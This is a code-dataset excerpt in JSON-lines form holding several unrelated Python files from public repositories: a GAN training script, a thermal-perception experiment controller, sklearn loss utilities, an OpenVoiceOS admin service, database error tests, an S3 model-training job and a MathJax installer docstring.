):\n with torch.no_grad():\n fake = netG(fixed_noise).detach().cpu()\n img_list.append(vutils.make_grid(fake, padding=2, normalize=True))\n\n iters += 1\n\n plt.figure(figsize=(10, 5))\n plt.title(\"Generator and Discriminator Loss During Training\")\n plt.plot(G_losses, label=\"G\")\n plt.plot(D_losses, label=\"D\")\n plt.xlabel(\"iterations\")\n plt.ylabel(\"Loss\")\n plt.legend()\n plt.show()\n\n fig = plt.figure(figsize=(8, 8))\n plt.axis(\"off\")\n ims = [[plt.imshow(np.transpose(i, (1, 2, 0)), animated=True)] for i in img_list]\n ani = animation.ArtistAnimation(\n fig, ims, interval=1000, repeat_delay=1000, blit=True\n )\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n multiprocessing.freeze_support()\n main()\n","repo_name":"RemcoGoy/PokemonGenerator","sub_path":"dcgan/dcgan.py","file_name":"dcgan.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72998556054","text":"################################ Import stuff ################################\nfrom classes_thermodes import Thermode\nfrom classes_arduino import ArdUIno\nfrom classes_arduino import *\nfrom classes_colther import Zaber\nfrom classes_camera import TherCam\nfrom saving_data import *\nfrom classes_text import TextIO\nfrom grabPorts import grabPorts\nfrom classes_audio import Sound\n\nimport globals\nimport time\nimport threading\nimport random\nimport numpy as np\nimport simpleaudio as sa\n\n################################ Defining some useful functions ############################\n# To home all zabers\ndef homingZabers(zabers):\n for kzabers, vzabers in zabers.items():\n for d in vzabers:\n try:\n d.device.home()\n except:\n d.home()\n\n# Move Zabers to starting position\ndef movetostartZabers(zabers, zaber, cond):\n poses = globals.positions[zaber][cond]\n print('\\nMoving Zabers of {} to: '.format(zaber))\n print(poses)\n\n if zaber == 'non_tactile':\n zaber = 'tactile'\n\n for d, p in zip(reversed(zabers[zaber]), poses):\n try:\n d.device.move_abs(p)\n # print(d)\n except:\n d.move_abs(p)\n\n################################ Function for Experiment ############################\ndef experiment(eng):\n################################ Set constants and objects ################################\n\n globals.frames['start'][1] = 'on'\n print('All ports:')\n ports = grabPorts()\n print(ports.ports)\n ### Camera\n globals.cam = TherCam()\n globals.cam.startStream()\n\n ### Zabers\n colther1 = Zaber(1, who = 'serial')\n colther2 = Zaber(2, port = colther1, who = 'serial')\n colther3 = Zaber(3, port = colther1, who = 'serial')\n\n camera12 = Zaber(1, who = 'modem', usb_port = 2, n_modem = 1)\n camera1 = camera12.device.axis(1)\n camera2 = camera12.device.axis(2)\n camera3 = Zaber(2, port = camera12, who = 'modem', usb_port = 2, n_modem = 1)\n\n tactile12 = Zaber(1, who = 'modem', usb_port = 2, n_modem = 2)\n tactile1 = tactile12.device.axis(1)\n tactile2 = tactile12.device.axis(2)\n tactile3 = Zaber(2, port = tactile12, who = 'modem', usb_port = 2, n_modem = 2)\n\n colther = [colther3, colther2, colther1]\n camera = [camera3, camera2, camera1]\n tactile = [tactile3, tactile2, tactile1]\n\n zabers = {'colther': [colther3, colther2, colther1], 'camera': [camera3, camera2, camera1],\n 'tactile': [tactile3, tactile2, tactile1]}\n\n # Arduino\n arduino_shutter = ArdUIno(usb_port = 2, n_modem = 4)\n arduino_pressure = ArdUIno(usb_port = 1, n_modem = 2)\n\n # Beep\n beep = Sound(400, 10)\n # Homing all the Zabers\n # thread_home_zabers = threading.Thread(target = homingZabers, args = [zabers])\n # thread_shake = threading.Thread(target = shakeShutter, args = [arduino_shutter, 3])\n #\n # thread_home_zabers.start()\n # thread_shake.start()\n\n # thread_home_zabers.join()\n # thread_shake.join()\n\n homingZabers(zabers)\n shakeShutter(arduino_shutter, 3)\n\n # Data\n data = {'tactile.experimental': {'rt': [], 'temperature': [], 'response': [],'RF': []},\n 'non_tactile.experimental': {'rt': [], 'temperature': [], 'response': [], 'RF': []},\n 'tactile.control': {'rt': [], 'temperature': [], 'response': [], 'RF': []},\n 'non_tactile.control': {'rt': [], 'temperature': [], 'response': [], 'RF': []},\n }\n\n n_cond_blocks = 8\n list_trials = globals.conditions * n_cond_blocks\n random.shuffle(list_trials)\n\n n_boosts = 2\n list_boosts_trials = globals.boost * n_boosts\n\n trials = list_boosts_trials + list_trials\n random.shuffle(trials)\n\n n_training = 2\n list_training = globals.conditions * n_training\n\n n_boosts_training = 1\n list_boosts_training = globals.boost * n_boosts_training\n\n training = list_boosts_training + list_training\n random.shuffle(training)\n\n ################################ Setting up ################################\n # Number of participant\n globals.frames['n_participant'][1] = 'on'\n globals.frames['start'][1] = 'off'\n\n while globals.frames['n_participant'][1] == 'on':\n # print('looping')\n time.sleep(1)\n\n globals.frames['age'][1] = 'on'\n\n print('Number of participant: ' + str(globals.n_subj))\n # print(type(globals.n_subj))\n # Ask participant their age\n\n while globals.frames['age'][1] == 'on':\n time.sleep(1)\n\n print('Age: ' + str(globals.subj_age))\n\n ################################ FINDING MICROSPOTS ################################\n globals.frames['microspots'][1] = 'on'\n\n while globals.frames['microspots'][1] == 'on':\n time.sleep(1)\n\n # Need to move camera and get readout of skin, we can stay in this screen to monitor temp\n # finish when we are done with finding microspots\n globals.frames['zabering'][1] = 'on'\n\n globals.current_device = 'camera'\n\n thread_zaber_skin_readout = threading.Thread(target = camera12.manualConGUIsingle, args = [zabers])\n thread_zaber_skin_readout.start()\n\n while globals.frames['zabering'][1] == 'on':\n time.sleep(1)\n\n ################################ Get position for big three ########################\n globals.frames['intro_big_three'][1] = 'on'\n\n while globals.frames['intro_big_three'][1] == 'on':\n time.sleep(1)\n\n # Need to move three zabers simultaneously to get colther, tactile and camera well aligned\n\n globals.hidden = False\n globals.frames['zabering'][1] = 'on'\n\n globals.current_device = 'camera'\n\n thread_zabers_big_three = threading.Thread(target = camera12.manualConGUIthree, args = [zabers, arduino_shutter])\n thread_zabers_big_three.start()\n\n while globals.frames['zabering'][1] == 'on':\n time.sleep(1)\n\n globals.hidden = True\n\n # Printing saved variables\n print('\\nPosition Camera: ')\n print(globals.positions['camera'])\n\n print('Position Colther: ')\n print(globals.positions['colther'])\n\n print('Position Non-tactile: ')\n print(globals.positions['non_tactile'])\n\n print('Position Tactile: ')\n print(globals.positions['tactile'])\n\n print('Centre ROI Control: ')\n print(globals.centreROI['control'])\n\n print('Centre ROI Experimental: ')\n print(globals.centreROI['experimental'])\n\n # # ################################ Get height for tactile ##############################\n # Intro\n globals.frames['intro_tactile_height'][1] = 'on'\n\n while globals.frames['intro_tactile_height'][1] == 'on':\n time.sleep(1)\n\n globals.frames['tactile_height'][1] = 'on'\n\n movetostartZabers(zabers, 'tactile', 'experimental')\n\n globals.current_device = 'tactile'\n # Thread\n e1 = threading.Event()\n e2 = threading.Event()\n es = [e1, e2]\n\n thread_zaber_skin_readout = threading.Thread(target = tactile12.manualConGUIdouble, args = [zabers, es])\n\n thread_zaber_skin_readout.start()\n\n arduino_pressure.readFloat(0, -2, globals.pressure, es)\n\n print('\\nPosition Tactile: ')\n print(globals.positions['tactile'])\n\n ##### Set baseline temperature\n globals.frames['baseline_temp'][1] = 'on'\n # print(globals.frames['baseline_temp'][1])\n\n while globals.frames['baseline_temp'][1] == 'on':\n time.sleep(1)\n\n print('\\nBaseline temperature: ' + globals.baseline_temp)\n\n ################################ Experiment #######################################\n ### Training\n globals.frames['intro_training'][1] = 'on'\n\n while globals.frames['intro_training'][1] == 'on':\n time.sleep(1)\n\n # QUEST for training\n # Setting up 1 prior distribution and 4 QUEST algorithms\n alphas = np.arange(28, 32.01, 0.01)\n alphas_list = list(alphas)\n alphas_ll = []\n for i in alphas_list:\n alphas_ll.append(round(i, 2))\n\n alphas_ll = [float(i) for i in alphas_ll]\n\n # QUEST algorithms\n TR_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n TR_non_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n TR_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n TR_non_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n TR_dict = {'tactile.experimental': TR_tact_exp,\n 'non_tactile.experimental': TR_non_tact_exp,\n 'tactile.control': TR_tact_con,\n 'non_tactile.control': TR_non_tact_con,\n }\n\n temp_training = float(globals.baseline_temp) - 2\n\n while globals.training_boolean == 'n':\n for i in np.arange(len(training)):\n train_string = training[i][0] + '.' + training[i][1]\n print(training[i][1])\n # Move zabers tactile\n movetostartZabers(zabers, training[i][0], training[i][1])\n # Move zabers camera\n movetostartZabers(zabers, 'colther', training[i][1])\n # Move zabers camera\n movetostartZabers(zabers, 'camera', training[i][1])\n\n # Injecting booster\n if len(training[i]) > 2:\n temp_training = 29\n\n # Open shutter, PID & sound\n globals.frames['fixation_cross'][1] = 'on'\n\n # Set threads\n evPID_train = threading.Event()\n # evBEEP = threading.Event()\n\n PID_train = threading.Thread(target = colther1.ROIPID, args = [zabers['colther'], temp_training, evPID_train, 20, arduino_shutter], daemon = True)\n beep_train = threading.Thread(target = beep.play, args = [evPID_train])\n\n # Start threads\n PID_train.start()\n beep_train.start()\n\n name_file_training = 'training_{}_{}_{}_{}'.format(globals.n_subj, training[i][0], training[i][1], i)\n globals.cam.PIDSavePosMeanShuFixROI(output = '../src_analysis/thermal_image/test1_14012020/{}'.format(name_file_training), r = 20., cond = training[i][1], duration = 10, event1 = evPID_train)\n\n sa.stop_all()\n\n # We get response and RT from participant\n globals.frames['response'][1] = 'on'\n globals.frames['fixation_cross'][1] = 'off'\n start_reply_train = time.time()\n\n while globals.frames['response'][1] == 'on':\n time.sleep(1)\n\n globals.frames['fixation_cross'][1] = 'on'\n\n end_reply_train = time.time()\n rt_trial_train = end_reply_train - start_reply_train\n\n if globals.answer == 'a': # YES\n response_train = 1\n elif globals.answer == 's': # NO\n response_train = 0\n\n # Get pdf for next trial\n TR_dict[train_string] = eng.quest_matlab_update(TR_dict[train_string], temp_training, response_train)\n\n #\n data_training = [rt_trial_train, temp_training, response_train, TR_dict[train_string]]\n print('Threshold trial: ')\n print(temp_training)\n\n temp_training = TR_dict[train_string]['xCurrent']\n\n print('Response: ' + globals.answer)\n print('Reaction Time: ' + str(rt_trial_train))\n homingZabers(zabers)\n\n globals.frames['fixation_cross'][1] = 'off'\n globals.frames['repeat_training'][1] = 'on'\n\n while globals.frames['repeat_training'][1] == 'on':\n time.sleep(1)\n\n ### Trials\n globals.frames['intro_trials'][1] = 'on'\n\n while globals.frames['intro_trials'][1] == 'on':\n time.sleep(1)\n\n # Set up QUEST algorithms\n RF_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n RF_non_tact_exp = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n RF_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n RF_non_tact_con = eng.quest_matlab_set_up(alphas_ll, nargout = 1)\n\n RF_dict = {'tactile.experimental': RF_tact_exp,\n 'non_tactile.experimental': RF_non_tact_exp,\n 'tactile.control': RF_tact_con,\n 'non_tactile.control': RF_non_tact_con,\n }\n\n temp_trial = globals.baseline_temp - 2\n # counter = 0\n\n for i in np.arange(len(trials)): #RF['stop'] == 0:\n cond_string = trials[i][0] + '.' + trials[i][1]\n print()\n # Move Zaber to position\n movetostartZabers(zabers, trials[i][0], trials[i][1])\n\n # Injecting booster\n if len(trials[i]) > 2:\n temp_trial = 29\n\n globals.frames['fixation_cross'][1] = 'on'\n\n # Open shutter and PID\n globals.frames['fixation_cross'][1] = 'on'\n\n # Set threads\n evPID = threading.Event()\n # evBEEP = threading.Event()\n\n PID = threading.Thread(target = colther1.ROIPID, args = [zabers['colther'], temp_trial, evPID, 20, arduino_shutter], daemon = True)\n beep_trial = threading.Thread(target = beep.play, args = [evPID])\n\n # Start threads\n PID.start()\n beep_trial.start()\n\n name_file = '{}_{}_{}_{}'.format(globals.n_subj, trials[i][0], trials[i][1], i)\n globals.cam.PIDSavePosMeanShuFixROI(output = '../src_analysis/thermal_image/test1_14012020/{}'.format(name_file), r = 20., cond = training[i][1], duration = 10, event1 = evPID)\n\n sa.stop_all()\n\n # We get response and RT from participant\n globals.frames['response'][1] = 'on'\n globals.frames['fixation_cross'][1] = 'off'\n start_reply = time.time()\n\n while globals.frames['response'][1] == 'on':\n time.sleep(1)\n\n globals.frames['fixation_cross'][1] = 'on'\n\n end_reply = time.time()\n rt_trial = end_reply - start_reply\n\n\n if globals.answer == 'a': # YES\n response_trial = 1\n elif globals.answer == 's': # NO\n response_trial = 0\n\n # Get pdf for next trial\n RF_dict[cond_string] = eng.quest_matlab_update(RF_dict[cond_string], temp_trial, response_trial)\n\n # Save data to data library\n data_trial = [rt_trial, temp_trial, response_trial, RF_dict[cond_string]]\n llaves_data = data.keys()\n # data[[*llaves_data][0]].keys()\n for (k,v), j in zip(data[cond_string].items(), np.arange(len(data_trial))):\n v.append(data_trial[j])\n\n temp_trial = RF_dict[cond_string]['xCurrent']\n\n print('Response: ' + globals.answer)\n print('Reaction Time: ' + rt_trial)\n homingZabers(zabers)\n\n # counter += 1\n\n # print(data)\n\n globals.frames['end'][1] = 'on'\n\n ################################ Writing data #####################################\n # Homing all the Zabers\n homingZabers(zabers)\n\n\n ### Data\n # Individual file\n saveIndv('nt_vs_t_CS_subj_{}'.format(globals.n_subj), globals.n_subj, data)\n\n # Everyone file\n apendAll('nt_vs_t_CS_ALL', globals.n_subj, data)\n\n\n ### AGE\n apendSingle('nt_vs_t_CS_AGE', globals.n_subj, globals.subj_age)\n\n apendSingle('nt_vs_t_CS_BASELINE_TEMP', globals.n_subj, globals.baseline_temp)\n","repo_name":"iezqrom/publication-cold-sensation-without-touch","sub_path":"code/data-collection/python/src_testing/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":16025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24505008681","text":"\"\"\"Utility functions for minimizers\"\"\"\n\nimport warnings\nfrom typing import Callable\nfrom inspect import getfullargspec\n\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.utils.validation import check_X_y, check_array, _check_y\n\nfrom .typing import Array_Nx1\n\n\nEPS = np.finfo(float).eps ** 0.5\nMETHODS = ('BFGS', 'L-BFGS-B', 'SLSQP')\n\n\nclass OneHotLabelEncoder(OneHotEncoder):\n \"\"\"Wrapper around sklearn.preprocessing.OneHotEncoder.\n\n Parameters:\n classes: [tuple] The known classes/targets in the training data.\n\n Attributes:\n n_classes_: Number of classes derived from classes argumenet.\n classes, OneHotEncoder attributes\n \"\"\"\n\n def __init__(self, classes):\n\n super().__init__(\n categories=[classes],\n drop=None,\n sparse=False,\n )\n\n self.classes = classes\n self.n_classes_ = len(classes)\n self.categories_ = [classes]\n self.n_features_in_ = 1\n self.drop_idx_ = None\n self.infrequent_categories_ = None\n self.feature_names_in_ = None\n\n def _validate_data(self, *args, **kwargs):\n\n kwargs.update(dict(ensure_2d=False))\n out = super().validate_data(*args, **kwargs)\n\n if out.ndim == 1:\n return out.reshape(-1,1)\n return out\n\n def fit(self, *args, **kwargs):\n \"\"\"Does nothing, categories are already known.\n \"\"\"\n\n return NotImplemented\n\n\nclass FilterCheckArgs:\n \"\"\"Functionality for filtering out appropriate `check_params` passed to\n BaseEstimatorABC._validate_data depending on whether `X`, `y`, or both are being validated.\n\n Parameters:\n None.\n\n Attributes:\n xy_params: [set] Parameters accepted by sklearn.utils.validation.check_X_y.\n x_params: [set] Parameters accepted by sklearn.utils.validation.check_array.\n y_params: [set] Parameters accepted by sklearn.utils.validation._check_y.\n \"\"\"\n\n def __init__(self):\n\n ignore = ['X', 'y', 'array']\n\n spec = getfullargspec(check_X_y)\n self.xy_params = set(arg for arg in spec.args+spec.kwonlyargs if arg not in ignore)\n\n spec = getfullargspec(check_array)\n self.x_params = set(arg for arg in spec.args+spec.kwonlyargs if arg not in ignore)\n\n spec = getfullargspec(_check_y)\n self.y_params = set(arg for arg in spec.args+spec.kwonlyargs if arg not in ignore)\n\n def __call__(self, val_X, val_y, args):\n \"\"\"Call functionality.\n\n Parameters:\n val_X: [bool] Whether or not `X` is being validated.\n val_y: [bool] Whether or not `y` is being validated.\n args: [dict] Keyword arguments passed to `_validate_data`.\n\n Returns:\n [dict] Filtered keyword arguments passed to `_validate_data`.\n\n Raises:\n RuntimeWarning if unrecognized keyword arguments are passed.\n \"\"\"\n\n for arg in args:\n if arg not in self.xy_params|self.x_params|self.y_params:\n warnings.warn(f'Unknown argument: {arg}', category=RuntimeWarning)\n\n if val_X and val_y:\n return {k:v for k, v in args.items() if k in self.xy_params}\n if val_X and not val_y:\n return {k:v for k, v in args.items() if k in self.x_params}\n if val_X and not val_y:\n return {k:v for k, v in args.items() if k in self.y_params}\n return {}\n\n# Initialize FilterCheckArgs as function\nfilter_check_args: Callable = FilterCheckArgs()\n\n\ndef check_weights(w: Array_Nx1, y: Array_Nx1) -> Array_Nx1:\n \"\"\"Validate that the observations weights are all positive and match the input data length.\n If no weights are passed, weights are set to 1/N for arithmetic averaging.\n\n Parameters:\n w: [ndarray] Array of obvservation weights.\n y: [ndarray] Array of training targets.\n\n Returns:\n [ndarray] Array of obvservation weights.\n\n Raises:\n ValueError if weights are not all positive and do not match input data length.\n \"\"\"\n\n if w is None:\n w = np.full(y.shape[0], 1/y.shape[0])\n else:\n w = np.asarray(w)\n if not (np.all(w>=0) and w.shape[0]==y.shape[0]):\n raise ValueError('Weights must be positive and have the same length as the input data')\n\n return w\n\n\ndef clip_probability(array):\n \"\"\"Remove infinite and NaN values and clip values arbitrarily close to 0 and 1.\n\n Parameters:\n array: [ndarray] Array to clip.\n\n Returns:\n [ndarray] Clipped array.\n\n Raises:\n None.\n \"\"\"\n\n array = np.nan_to_num(array, copy=True, nan=0.5)\n array = np.clip(array, a_min=EPS, a_max=1-EPS)\n\n return array\n\n\ndef check_loss_inputs(target, prediction,\n expected_targets=None,\n multi_output=False,\n order='C',\n allow_nd=False,\n clip_probas=False):\n \"\"\"Validate target and prediction inputs for loss functions.\n\n Parameters:\n targets: [ndarray] Array of targets.\n predictions: [ndarray] Array of predictions.\n expected_targets: [set] Expected target values for classification.\n multi_output: [bool] Whether output is multi-dimmensional.\n order: [str] Whether an array will be forced to be fortran or c-style.\n allow_nd: [bool] Whether to allow array.ndim > 2.\n clip_probas: [bool] Clip probabilistic predictions arbitrarily close to 0 and 1.\n\n Returns:\n [ndarray] Array of obvservation weights.\n\n Raises:\n ValueError if weights are not all positive and do not match input data length.\n \"\"\"\n\n target = check_array(target, ensure_2d=False, allow_nd=allow_nd, order=order)\n prediction = check_array(prediction, ensure_2d=False, allow_nd=allow_nd, order=order)\n\n if multi_output and target.ndim==1:\n target = target.reshape(-1,1)\n if multi_output and prediction.ndim==1:\n prediction = prediction.reshape(-1,1)\n if not multi_output:\n target = target.flatten()\n prediction = prediction.flatten()\n\n if clip_probas:\n prediction = clip_probability(prediction)\n\n if not target.shape == prediction.shape:\n raise ValueError('Target shape and prediction shapes do not match')\n\n if expected_targets is None:\n return target, prediction\n\n # Values in targets not in expected target values\n difference = set(np.unique(target)) - set(expected_targets)\n if len(difference) > 0:\n raise ValueError(\n f'{difference} were found in `targets` but not specified in `expected_targets`'\n )\n\n return target, prediction\n","repo_name":"willarliss/GeneralLoss","sub_path":"minimizers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2574113807","text":"from ovos_plugin_manager.phal import find_admin_plugins\nfrom ovos_utils import wait_for_exit_signal\nfrom ovos_config import Configuration\nfrom ovos_utils.log import LOG, init_service_logger\n\nfrom ovos_PHAL import PHAL\n\n\ndef on_admin_ready():\n LOG.info('PHAL Admin is ready.')\n\n\ndef on_admin_stopping():\n LOG.info('PHAL Admin is shutting down...')\n\n\ndef on_admin_error(e='Unknown'):\n LOG.error(f'PHAL Admin failed to launch ({e}).')\n\n\ndef on_admin_alive():\n LOG.info('PHAL Admin is alive')\n\n\ndef on_admin_started():\n LOG.info('PHAL Admin is started')\n\n\nclass AdminPHAL(PHAL):\n \"\"\"\n Args:\n config (dict): PHAL admin config, usually from mycroft.conf PHAL.admin section\n bus (MessageBusClient): mycroft messagebus connection\n watchdog: (callable) function to call periodically indicating\n operational status.\n \"\"\"\n\n def __init__(self, config=None, bus=None, on_ready=on_admin_ready, on_error=on_admin_error,\n on_stopping=on_admin_stopping, on_started=on_admin_started, on_alive=on_admin_alive,\n watchdog=lambda: None, skill_id=\"PHAL.admin\", **kwargs):\n if config and \"admin\" not in config:\n config = {\"admin\": config}\n super().__init__(config, bus, on_ready, on_error, on_stopping, on_started, on_alive, watchdog, skill_id, **kwargs)\n\n def load_plugins(self):\n for name, plug in find_admin_plugins().items():\n # load the plugin only if not defined as user plugin\n # (for plugins that can be used as admin or user plugins)\n if name in self.user_config:\n LOG.debug(f\"PHAL plugin {name} runs as user plugin, skipping\")\n continue\n\n config = self.admin_config.get(name) or {}\n enabled = config.get(\"enabled\")\n if not enabled:\n continue # require explicit enabling by user\n if hasattr(plug, \"validator\"):\n enabled = plug.validator.validate(config)\n\n if enabled:\n try:\n self.drivers[name] = plug(bus=self.bus, config=config)\n LOG.info(f\"PHAL Admin plugin loaded: {name}\")\n except Exception:\n LOG.exception(f\"failed to load PHAL Admin plugin: {name}\")\n continue\n\n\ndef main(ready_hook=on_admin_ready, error_hook=on_admin_error, stopping_hook=on_admin_stopping):\n # config read from mycroft.conf\n # \"PHAL\": {\n # \"admin\": {\n # \"ovos-PHAL-plugin-system\": {\"enabled\": True}\n # }\n # }\n init_service_logger(\"PHAL_admin\")\n phal = AdminPHAL(on_error=error_hook, on_ready=ready_hook, on_stopping=stopping_hook)\n phal.start()\n wait_for_exit_signal()\n phal.shutdown()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OpenVoiceOS/ovos-PHAL","sub_path":"ovos_PHAL/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43547241609","text":"# -*- coding: utf-8 -*-\nimport unittest\nimport psycopg2\nimport mock\nfrom pgclient.exceptions import ErrorsRegistry as registry, PgClientError\n\n\nclass ErrorsRegistryTest(unittest.TestCase):\n def test_registry(self):\n from psycopg2 import errorcodes\n codes = {k: v for k, v in errorcodes.__dict__.items()\n if k.startswith('CLASS_')}\n\n self.assertTrue(registry.ERRORS)\n # print(set(codes.values()) - set(registry.ERRORS.keys()))\n self.assertEqual(len(codes), len(registry.ERRORS))\n for code, cls in registry.ERRORS.items():\n self.assertTrue(issubclass(cls, PgClientError))\n\n def test_get_error_class(self):\n pg_code = '42P01'\n cls = registry.get_error_class(pg_code)\n self.assertTrue(issubclass(cls, PgClientError))\n self.assertEqual(cls.CLASS_CODE, '42')\n\n def test_get_error_class_with_none_code(self):\n pg_code = None\n cls = registry.get_error_class(pg_code)\n self.assertEqual(cls, PgClientError)\n\n def test_get_error(self):\n error = mock.MagicMock(spec=psycopg2.Error)\n pg_code = '08006'\n pg_error = 'error'\n diag = 'connection_failure'\n message = 'Connection failure'\n setattr(error, 'pgcode', pg_code)\n setattr(error, 'pgerror', pg_error)\n setattr(error, 'diag', diag)\n setattr(error, 'message', message)\n instance = registry.get_error(error)\n self.assertIsInstance(instance, PgClientError)\n\n self.assertEqual(instance.message, message)\n self.assertEqual(instance.pgcode, pg_code)\n self.assertTrue(instance.diag, diag)\n self.assertIn(instance.pgerror, pg_error)\n","repo_name":"prawn-cake/pgclient","sub_path":"pgclient/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"15938405088","text":"import tempfile\n\nimport awswrangler as wr\nimport boto3\nimport joblib\nfrom cobra.evaluation import plot_variable_importance, plot_performance_curves, plot_univariate_predictor_quality, \\\n plot_correlation_matrix\nfrom cobra.model_building import univariate_selection, ForwardFeatureSelection\nfrom cobrademo.storage import s3_root, s3_prefix\nfrom cobrademo.jobs import entrypoint\n\n\n@entrypoint(\"model_training\")\ndef run(env: str, date: str):\n basetable = wr.s3.read_parquet(s3_root(env) + f\"/{date}/basetable\", dataset=True)\n basetable = fix_types(basetable)\n preselected_predictors = feature_selection(basetable)\n model = train_model(basetable, preselected_predictors)\n\n s3 = boto3.client('s3')\n key = s3_prefix(env) + f'/{date}/model.pkl'\n print(key)\n with tempfile.TemporaryFile() as fp:\n joblib.dump(model, fp)\n fp.seek(0)\n s3.put_object(Body=fp.read(), Bucket='datafy-training', Key=key)\n wr.s3.to_parquet(\n df=basetable,\n dataset=True,\n database=\"cobra\",\n path=s3_root(env) + f\"/{date}/basetable\",\n table=\"basetable\",\n mode='overwrite'\n )\n\n\ndef fix_types(basetable):\n int64_conversion = {c: 'int64' for c in basetable.select_dtypes(include=['Int64']).columns}\n basetable = basetable.astype(int64_conversion)\n return basetable\n\n\ndef feature_selection(basetable):\n target_column_name = \"target\"\n preprocessed_predictors = [\n col for col in basetable.columns.tolist() if \"_enc\" in col\n ]\n\n df_auc = univariate_selection.compute_univariate_preselection(\n target_enc_train_data=basetable[basetable[\"split\"] == \"train\"],\n target_enc_selection_data=basetable[basetable[\"split\"] == \"selection\"],\n predictors=preprocessed_predictors,\n target_column=target_column_name,\n preselect_auc_threshold=0.53,\n preselect_overtrain_threshold=0.05,\n )\n plot_univariate_predictor_quality(df_auc)\n # get a list of predictors selected by the univariate selection\n preselected_predictors = univariate_selection.get_preselected_predictors(df_auc)\n\n # compute correlations between preprocessed predictors\n df_corr = univariate_selection.compute_correlations(\n basetable[basetable[\"split\"] == \"train\"], preprocessed_predictors\n )\n plot_correlation_matrix(df_corr)\n print(\"preselected predictors: \" + \", \".join(preselected_predictors))\n return preselected_predictors\n\n\ndef train_model(basetable, preselected_predictors):\n target_column_name = \"target\"\n forward_selection = ForwardFeatureSelection(max_predictors=30,\n pos_only=True)\n\n forward_selection.fit(basetable[basetable[\"split\"] == \"train\"],\n target_column_name,\n preselected_predictors)\n\n performances = (forward_selection\n .compute_model_performances(basetable, target_column_name))\n plot_performance_curves(performances)\n\n # after plotting the performances and selecting the model,\n model = forward_selection.get_model_from_step(4)\n\n # we have chosen model with 5 variables, which we extract as follows\n final_predictors = model.predictors\n\n # we can also compute and plot the importance of each predictor in the model:\n variable_importance = model.compute_variable_importance(\n basetable[basetable[\"split\"] == \"selection\"])\n\n # this is correlation of the model score and predictor\n plot_variable_importance(variable_importance)\n return model\n","repo_name":"datamindedbe/datafy-cobrademo","sub_path":"src/cobrademo/jobs/model_training.py","file_name":"model_training.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15221420415","text":"import json\nimport time\nfrom colearn_grpc.example_mli_factory import ExampleMliFactory\nfrom colearn_grpc.grpc_server import GRPCServer\nfrom colearn_grpc.logging import get_logger\nfrom colearn_grpc.example_grpc_learner_client import ExampleGRPCLearnerClient\n\n# Register scania models and dataloaders in the FactoryRegistry\n# pylint: disable=W0611\nimport colearn_keras.keras_scania # type:ignore # noqa: F401\n\n\n_logger = get_logger(__name__)\n\n\ndef test_keras_scania_with_grpc_sever():\n _logger.info(\"setting up the grpc server ...\")\n\n server_port = 34567\n server_key = \"\"\n server_crt = \"\"\n enable_encryption = False\n\n server = GRPCServer(\n mli_factory=ExampleMliFactory(),\n port=server_port,\n enable_encryption=enable_encryption,\n server_key=server_key,\n server_crt=server_crt,\n )\n\n server.run(wait_for_termination=False)\n\n time.sleep(2)\n\n client = ExampleGRPCLearnerClient(\n \"scania_client\", f\"127.0.0.1:{server_port}\", enable_encryption=enable_encryption\n )\n\n client.start()\n\n ml = client.get_supported_system()\n data_loader = \"KERAS_SCANIA\"\n model_architecture = \"KERAS_SCANIA\"\n assert data_loader in ml[\"data_loaders\"].keys()\n assert model_architecture in ml[\"model_architectures\"].keys()\n\n data_location = \"gs://colearn-public/scania/0\"\n assert client.setup_ml(\n data_loader,\n json.dumps({\"location\": data_location}),\n model_architecture,\n json.dumps({})\n )\n\n weights = client.mli_propose_weights()\n assert weights.weights is not None\n\n client.mli_accept_weights(weights)\n assert client.mli_get_current_weights().weights == weights.weights\n\n client.stop()\n server.stop()\n","repo_name":"fetchai/colearn","sub_path":"colearn_keras/test_keras_scania.py","file_name":"test_keras_scania.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"67"} +{"seq_id":"37714796990","text":"from collections import defaultdict\nN,M=map(int, input().split())\nedges=defaultdict(list)\nfor _ in range(M):\n a,b=map(int, input().split())\n edges[a-1].append(b-1)\n edges[b-1].append(a-1)\norders=[]\ntargets=[N-1-i for i in range(N)]\nwhile len(orders)>> from IPython.external.mathjax import install_mathjax\n >>> install_mathjax()\n\nFrom the command line:\n\n $ python -m IPython.external.mathjax\n\nTo a specific location:\n\n $ python -m IPython.external.mathjax -i /usr/share/\n\nwill install mathjax to /usr/share/mathjax\n\nTo install MathJax from a file you have already downloaded:\n\n $ python -m IPython.external.mathjax mathjax-xxx.tar.gz\n $ python -m IPython.external.mathjax mathjax-xxx.zip\n\nIt will not install MathJax if it is already there. Use -r to\nreplace the existing copy of MathJax.\n\nTo find the directory where IPython would like MathJax installed:\n\n $ python -m IPython.external.mathjax -d\n\n\"\"\"\nfrom __future__ import print_function\n\n\n#-----------------------------------------------------------------------------\n# Copyright (C) 2011 The IPython Development Team\n#\n# Distributed under the terms of the BSD License. The full license is in\n# the file COPYING, distributed as part of this 